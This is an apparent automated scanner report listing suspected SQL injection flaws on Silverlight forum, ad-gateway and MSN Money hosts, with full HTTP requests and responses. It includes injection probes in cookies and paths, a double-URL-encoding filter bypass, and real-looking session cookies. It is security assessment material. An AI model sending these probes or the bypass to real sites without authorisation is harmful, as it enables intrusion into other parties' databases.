GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 125316 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:51 GMT; expires=Mon, 30-Jan-2012 16:12:51 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:51 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 16:12:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]...
1.17. http://forums.silverlight.net/user/viewonline.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums.silverlight.net
Path:
/user/viewonline.aspx
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /user/viewonline.aspx?1'=1 HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 124531 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:31 GMT; expires=Mon, 30-Jan-2012 16:12:31 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:31 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 16:12:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]... <a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a> ...[SNIP]...
The omniID cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the omniID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a'%20and%201%3d1--%20; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 260462 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:07:50 GMT; expires=Mon, 30-Jan-2012 16:07:50 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:27:50 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 16:07:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]... <a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /gateway/gw.js'%20and%201%3d1--%20 HTTP/1.1 Host: js.revsci.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk92mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;
Response 1
HTTP/1.1 500 Internal Server Error Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Length: 1488 Date: Sun, 30 Jan 2011 02:09:10 GMT Connection: close
<html><head><title>Apache Tomcat/5.5.23 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans ...[SNIP]... <pre>java.lang.NullPointerException com.revenuescience.util.CustomerConfigManager.getCustomerConfig(CustomerConfigManager.java:20) com.revenuescience.audiencesearch.jss.gs.GatewayServlet.doGet(GatewayServlet.java:202) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) </pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.23 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.23</h3></body></html>
Request 2
GET /gateway/gw.js'%20and%201%3d2--%20 HTTP/1.1 Host: js.revsci.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk92mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;
Response 2
HTTP/1.1 500 Internal Server Error Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Length: 1180 Date: Sun, 30 Jan 2011 02:09:10 GMT Connection: close
<html><head><title>Apache Tomcat/5.5.23 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans ...[SNIP]... <pre>java.lang.NullPointerException </pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.23 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.23</h3></body></html>
The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 02:13:01 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET / HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2 (redirected)
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 02:13:01 GMT Server: Microsoft-IIS/6.0 Location: http://money.redacted// Content-Length: 54
object moved <a href="http://money.msn.com//">here</a>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET / HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D%2527; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:02:50 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET / HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D%2527%2527; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 30 Jan 2011 18:02:51 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET pragma: no-cache Location: http://moneycentral.msn.com/home.asp Content-Length: 157 Content-Type: text/html Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://moneycentral.redacted/home.asp">here</a>.</body>
The ATC_ID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ATC_ID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ATC_ID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /detail/stock_quote?symbol= HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 02:16:18 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /detail/stock_quote?symbol= HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041%2527%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
